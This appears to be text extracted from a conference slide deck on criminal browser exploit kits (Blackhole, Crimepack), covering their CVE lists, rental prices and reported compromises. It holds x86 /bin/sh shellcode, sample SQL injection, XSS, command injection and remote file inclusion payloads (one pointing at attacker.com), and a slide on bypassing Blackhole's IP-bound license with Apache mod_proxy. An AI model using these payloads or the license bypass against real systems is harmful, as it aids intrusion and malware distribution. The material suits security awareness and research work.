Exploit the Exploit Kits (Dhruv Soi)

© Hacker Distinct Objects, any unauthorized copying or distribution of this material is strictly prohibited http://hacker.do

Exploit The Exploit Kits

Presented By:

Dhruv Soi

Chief Mentor @ Hacker Distinct Objects Director @ Torrid Networks Chair @OWASP India


Disclaimer


Agenda

#whoami Segmentation Fault

#./exploit –mode Basics AAAAAAAAAAAAAAAAAAAAAAAAAAAAA

#history; lastlog ummm

#watch ‘demo –kits blackhole crimepack’ Boom!

#make –bypass License Oops!

#shutdown -r now “Questions?“ Thank You



Who am I?

Chief Mentor – HDO, Founder – Torrid Networks, Chair – OWASP India

Past Experience – Fidelity Investments, Tech Mahindra (iPolicy), Sopra Group, FCS

Speaker – NASSCOM, DSCI, CII, OWASP India, OWASP Taiwan, OWASP Portugal

Author – Linux For You, Benefit, IT Magazine, HNS, SearchSecurity

Expertise – None. Only passionate about InfoSec, just another learner!

Organizer for OWASP Asia 2009 – Director - NTRO, CBI Director, US – White House Cyber Czar, Ex-CIA Director invited as Chief Guest

OWASP 2012 – Be Ready!


Basics of Exploitation


Art of Exploitation


Vulnerability to Exploitation

8


Practical Exploitation


Software Vulnerabilities @ Glance

Buffer Overflow

Format String

Code/File Injection

Privilege Escalation

Denial of Service

10

global code_start global code_end .data code_start: jmp 0x17 popl %esi movl %esi,0x8(%esi) xorl %eax,%eax movb %eax,0x7(%esi) movl %eax,0xc(%esi) my_execve: movb $0xb,%al movl %esi,%ebx leal 0x8(%esi),%ecx xorl %edx,%edx int $0x80 call -0x1c .string "/bin/shX" code_end:


Application Vulnerabilities @ Glance

SQL Injection ‘ OR 1=1--

Cross Site Scripting <script>alert(“Hello”)</script>

File Inclusion /index.php?page=http://www.attacker.com/attack.txt

Command Injection

/lookup.php|dir c:

Session Hijack

.

.

11


Traditional Attack Scenario

Identify Target

Port Scan

Vulnerability Identification

Exploit

Privilege Elevation

Access Resources

Replicate to other targets (worms)

12


Attack Challenges

Identifying a user not on internet (public/static IP address)?

LAN Users

Attacking a user behind Firewall

Network Firewalls

Host based Firewalls

Patched Machines, Latest Exploits (0-Days)

Antivirus

Too much manual work - Time is money!

13


From Servers to Client

Identify user from social networks, search engines, emails, address book, logs or behavior

Target Client Side Attacks Browser based (Mozilla, IE, Safari, etc.)

Adobe Reader

Adobe Flash

Sun Java

Media Players

User needs to click the URL pointing to hosted exploit Send Email

Insert to his favorite website

14


Client Side Vulnerabilities - Metasploit

Microsoft Windows WebDAV Application DLL Hijacker

Apple QuickTime 7.6.7 _Marshaled_pUnk Code Execution

Microsoft Windows Shell LNK Code Execution (MS10-046)

Microsoft Help Center XSS and Command Execution (MS10-042)

Microsoft Internet Explorer iepeers.dll Use After Free (MS10-018)

Microsoft Internet Explorer Tabular Data Control Exploit (MS10-018)

Microsoft Internet Explorer "Aurora" Memory Corruption (MS10-002)

FireFox 3.5 escape Return Value Memory CorruptionAdobe PDF Embedded EXE Social Engineering

Firefox location.QueryInterface() Code Execution

Mozilla Suite/Firefox InstallVersion->compareTo() Code Execution

Mozilla Suite/Firefox Navigator Object Code Execution

Adobe Collab.getIcon() Buffer Overflow

Adobe Collab.collectEmailInfo() Buffer Overflow

Adobe Flash Player "newfunction" Invalid Pointer Use

Adobe Flash Player "Button" Remote Code Execution

Sun Java Calendar Deserialization Exploit

Sun Java JRE getSoundbank file:// URI Buffer Overflow

Sun Java JRE AWT setDiffICM Buffer Overflow

Too many exploits, too lesser time! 15

© Hacker Distinct Objects, any unauthorized copying or distribution of this material is strictly prohibited http://hacker.do 16


Java Rhino

17

CVE-2011-3544 : Java Applet Rhino Script Engine Remote Code Execution




Demonstration Time…

20


Source: https://community.rapid7.com/community/metasploit/blog/2011/11/30/test-results-for-javarhino



Exploit Kits

PHP, Mysql, List of Exploits, Obfuscated Code

Centralized Console – Dashboards

Generates iFrame

Sends exploits automatically to the victim browser on visiting the website (iFrame)

Pushes the payload (Bot, Trojan, Keylogger) to the victim’s machine on successful exploitation

Records the stats

OOPS! Antivirus Evasion, Scanning

All Automated – Sometimes its good to be lazy!

23


Blackhole & Crimepack

24


Blackhole Exploits

Internet Explorer CVE-2010-1885 HCP

CVE-2006-0003 IE MDAC

Adobe Software CVE-2008-2992 Adobe Reader util.printf

CVE-2009-0927 Adobe Reader Collab GetIcon

CVE-2007-5659 Adobe Reader CollectEmailInfo

Java Software CVE-2009-1671 Java buffer overflows in the Deployment Toolkit ActiveX control in

deploytk.dll

CVE-2010-0840 Java trusted Methods Chaining Remote Code Execution Vulnerability

CVE-2010-0842 Java JRE MixerSequencer Invalid Array Index Remote Code Execution Vulnerability

CVE-2010-0886 Java Unspecified vulnerability in the Java Deployment Toolkit component in Oracle Java SE

CVE-2010-1423 Java argument injection vulnerability in the URI handler in Java NPAPI plugin

25


Crimepack Exploits

name="mdac" desc="IE6 COM CreateObject Code

Execution" CVE-2006-0003

name="msiemc" desc="IE7 Uninitialized Memory

Corruption" CVE-2010-0806

name="java" desc="JRE getSoundBank Stack BOF"

CVE-2009-3867

name="iepeers" desc="IEPeers Remote Code Execution"

CVE-2010-0806

name="pdfexpl" desc="PDF Exploits [collectEmailInfo

(CVE-2007-5659), getIcon (CVE-2009-0927), util.printf (CVE-2008-2992)]"

name="opera" desc="Opera TN3270" CVE-2009-3269

26

name="aol" desc="AOL Radio AmpX Buffer

Overflow" CVE-2007-5755

name="iexml" desc="Internet Explorer 7 XML Exploit"

CVE-2008-4844

name="firefoxdiffer" desc="Firefox 3.5/1.4/1.5 exploits" CVE-

2009-355

name="libtiff" desc="Adobe Acrobat LibTIFF Integer

Overflow" CVE-2010-0188

name="spreadsheet" desc="OWC Spreadsheet Memory

Corruption" CVE-2009-1136

name="activexbundle" desc="Bundle of ActiveX exploits" CVE-

2008-2463



Crimepack

28


Blackhole, hick hick!

29


Whew! Demonstration Time...

30


Exploit Kits in News

November 2, 2011: Blackhole Exploit Kit attack on WampServer & Wordpress sites

October 13, 2011: Approximately 16,000 compromised pages are redirecting users to the site that's hosting the Nice Pack exploit kit

September 27, 2011: MySQL.com hacked to serve malware

May 17, 2011: Geek.com Site Hacked Via Blackhole Exploit Kit

April 11, 2011: US Postal Service (USPS.gov) website victim of Blackhole exploit kit

May 05, 2010: U.S. Treasury Website Hacked Using Exploit Kit

31


There are just too many of those….

32


Data Leakage, Even Exploit Kits!

May 22, 2011: First Public Release of BlackHole Exploit Kit!

May 14, 2011: Crimepack 3.1.3 Exploit kit Leaked, available for Download!

May 13, 2011: 26 Underground Hacking Exploit Kit available for Download!

April 14, 2011: Phoenix exploit kit 2.5 leaked, Download Now!

33


Managed Hacking Services

Blackhole Deal – Am ain’t their marketing guy!

Annual license: $ 1500

Half-year license: $ 1000

3-month license: $ 700

Update FUD $ 50

Changing domain $ 20 multidomain $ 200 to license.

During the term of the license all the updates are free.

Rent on Blackhole servers:

• 1 week (7 full days): $ 200

• 2 weeks (14 full days): $ 300

• 3 weeks (21 full day): $ 400

• 4 weeks (31 full day): $ 500

• 24-hour test: $ 50

34


Obfuscated Code…

35


Bypass License

License is bound to IP (Public IP – IP1), kit checks for the IP from the HTTP headers and grants access

How about configuring your server with the IP address on which Kit is built upon? – Routing issues?

Configure owned public IP - eth0 (IP2), configure exploit kits public IP - eth1 (IP1)

Configure Apache VirtualHost IP1:80 with exploit kit path

Configure Apache VirtualHost IP2:80 with mod_proxy module

Configure Apache mod_proxy to forward the request from IP2:80 IP1:80

Kit thinks its license is in use since the request are coming to IP1

36


Protecting from Exploit Kits?

Out of Scope for now!

37


We are hiring!

38

Malware Writers

Exploit Writers

InfoSec Trainers Onsite

Opportunity in South Africa


Questions?

39

SANTA

Technology

Exploit the Exploit Kits (Dhruv Soi)